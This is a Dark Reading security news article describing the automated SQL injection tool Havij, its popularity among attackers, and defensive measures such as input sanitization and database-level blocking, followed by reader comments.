Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Application Security //

Database Security

07:26 PM

Cybercrime's Love Affair With Havij Spells SQL Injection Trouble

Automated SQL injection attack tool makes database extraction as easy as a button click for cybercriminals

Today's exponential increase in attack volume and complexity can largely be chalked up to the cybercriminal's creed of working smarter, not harder. It isn't so much l33t hackers toiling at code for hours that enterprises have to worry about. Instead, it's the nontechnical crooks who can carry out their attacks with a few clicks of a button using automated tools that do the technical dirty work for them. In the database-cracking world, Havij stands as one of the most popular of these tools. As such, it should be on the radar of any security professional seeking to prevent costly data breaches within their environments.

"If you're talking about databases and the tools that are used to perform SQL injection, Havij is one of the most common," says Noa Bar Yosef, senior security strategist at Imperva.

Developed by Iranian hackers sometime in spring 2010, Havij is named for the Farsi word for "carrot," which also doubles as colorful slang for the male sexual organ. Corny penetration jokes notwithstanding, the tool has so completely captured the hearts and minds of the black hat community that groups like Anonymous frequently train their legions on how to wreak havoc using it, says Josh Shaul, CTO of Application Security Inc.

"So when I sat and read chat logs from Anonymous IRC rooms where they do hacker training, the only thing I ever see mentioned is Havij," Shaul says. "The reason for that is Havij is awesome. And it's as powerful and easy to use as could be."

Favored by hacktivists and financially motivated attackers alike, Havij automates bad guys' SQL injection attacks by automatically detecting the database behind a targeted website, detecting whether it uses a string or integer parameter type, and testing different injection syntaxes on the target. Unlike a lot of penetration tools, Havij can not only point to potential vulnerabilities, it can also carry out data extraction and harvesting.

"By using this software, a user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements, and even access the underlying file system and executing commands on the operating system," said a recent Imperva executive report (PDF). All of it is carried out through a simple GUI interface through which an attacker can carry out an attack with a few clicks.

"Basically, you fire up the product: There's a box at the top of the screen where it wants you to type some kind of Web page, so you type it in and then there's a button that says 'Analyze.' It's like the 'Go' button, and you click 'Go.' Literally, that's it," Shaul says. "So it comes back and says, 'Hey, I found a SQL injection potential on this site.'"

At that point, the tool returns information about what kind of server and DBMS system is running on the back-end and whether or not it is running with administrative privileges in the database.

"So then there are a few other things that you can do. There's a button that's just called 'Info,' and if you click that button, it'll go out and get a bunch of detailed info about the database," Shaul says. "There's a button called 'Table.' If you click that button, it'll go into that database and come back with a list of tables in that database that you can navigate, sort of like navigating through a Windows file explorer where you can click on the table name, and it'll expand out." The ease of use and power of the tool should be enough to get the attention of enterprises seeking to prevent breaches, such as the one last spring at PBS that gave hackers the ability to post phony story headlines on the PBS site -- an attack that came at the hands of an attacker using Havij.

"What it means for enterprises is that everybody out there that wants it has sort of industrial-grade SQL injection test kits at their fingertips," Shaul says. "And if organizations aren't really rigorously testing their applications for SQL injection vulnerabilities, they're going to be missing something that an attacker is not going to miss."

The key to preventing SQL injection attacks starts at the application level because enterprises need to do a better job sanitizing input to neutralize the effects of injection queries. Obviously, though, there's a whole host of applications already in production that still need protecting.

That's where database security tools with SQL injection blocking come into play.

"SQL injection is all about dirty input. In the end, the solution is input sanitization. That's an easy thing to say -- it's not an easy thing to do. You've got to put up some applications ... that are running that you'd like to fix, but it's going to take time. So the stop-gap measure that I think folks need to implement is database security," Shaul says. "Bringing that security right to where the data lives is the best way to effectively protect it while you're going through the process of fixing these known vulnerabilities in the environment."

According to Rob Rachwald, director of security for Imperva, Havij, in particular, has characteristics that make it possible for blocking tools to detect activity in real time.

"When it hits the website, it gives a certain fingerprint that says, 'Hey, I'm an attack tool,'" Rachwald says. "So you can block that traffic right there."

Have a comment on this story? Please click "Add Your Comment" below. If you'd like to contact Dark Reading's editors directly, send us a message.

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
User Rank: Ninja
4/2/2012 | 5:38:58 PM
re: Cybercrime's Love Affair With Havij Spells SQL Injection Trouble
Some good tips here about preventing SQL injection bugs in your code --
Brian Prince, InformationWeek/Dark Reading Comment Moderator
User Rank: Apprentice
4/1/2012 | 12:09:28 AM
re: Cybercrime's Love Affair With Havij Spells SQL Injection Trouble
People tend to forget that it's not attacker tools that make vulnerabilities as bad as SQL injection -- it's developers. Developers caused this problem; this is their technical debt.-

Havij doesn't find and exploit advanced SQL injection vulnerabilities. Heck, it doesn't even find SQL injection vulnerabilities at all -- it only exploits ones already found. Stranger still, Havij works best with vanilla SQL injection vulnerabilities.

A vanilla SQL injection vulnerability is akin to binding a bash shell to port 1337 using inetd. It's a glaring, visible, huge backdoor waiting for anyone to target it.

To put this in a context that maybe you'll understand in the physical world: it's like putting a huge stockpile of gold bars in your foyer and leaving your front door wide open with a huge sign on your lawn reading "FREE GOLD INSIDE".

Havij is merely a figurative wheel barrow designed to lift the gold out of your foyer. It's not complex or insightful.
Inside the Ransomware Campaigns Targeting Exchange Servers
Kelly Sheridan, Staff Editor, Dark Reading,  4/2/2021
Beyond MITRE ATT&CK: The Case for a New Cyber Kill Chain
Rik Turner, Principal Analyst, Infrastructure Solutions, Omdia,  3/30/2021
Register for Dark Reading Newsletters
White Papers
Current Issue
2021 Top Enterprise IT Trends
We've identified the key trends that are poised to impact the IT landscape in 2021. Find out why they're important and how they will affect you today!
Flash Poll
How Enterprises are Developing Secure Applications
How Enterprises are Developing Secure Applications
Recent breaches of third-party apps are driving many organizations to think harder about the security of their off-the-shelf software as they continue to move left in secure software development practices.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2021-04-17
The overlayfs implementation in the linux kernel did not properly validate with respect to user namespaces the setting of file capabilities on files in an underlying file system. Due to the combination of unprivileged user namespaces along with a patch carried in the Ubuntu kernel to allow unprivile...
PUBLISHED: 2021-04-17
Shiftfs, an out-of-tree stacking file system included in Ubuntu Linux kernels, did not properly handle faults occurring during copy_from_user() correctly. These could lead to either a double-free situation or memory not being freed at all. An attacker could use this to cause a denial of service (ker...
PUBLISHED: 2021-04-17
A command injection vulnerability has been reported to affect QTS and QuTS hero. If exploited, this vulnerability allows attackers to execute arbitrary commands in a compromised application. We have already fixed this vulnerability in the following versions: QTS Build 20210202 and later Q...
PUBLISHED: 2021-04-17
An SQL injection vulnerability has been reported to affect QNAP NAS running Multimedia Console or the Media Streaming add-on. If exploited, the vulnerability allows remote attackers to obtain application information. QNAP has already fixed this vulnerability in the following versions of Multimedia C...
PUBLISHED: 2021-04-16
jose-node-esm-runtime is an npm package which provides a number of cryptographic functions. In versions prior to 3.11.4 the AES_CBC_HMAC_SHA2 Algorithm (A128CBC-HS256, A192CBC-HS384, A256CBC-HS512) decryption would always execute both HMAC tag verification and CBC decryption, if either failed `JWEDe...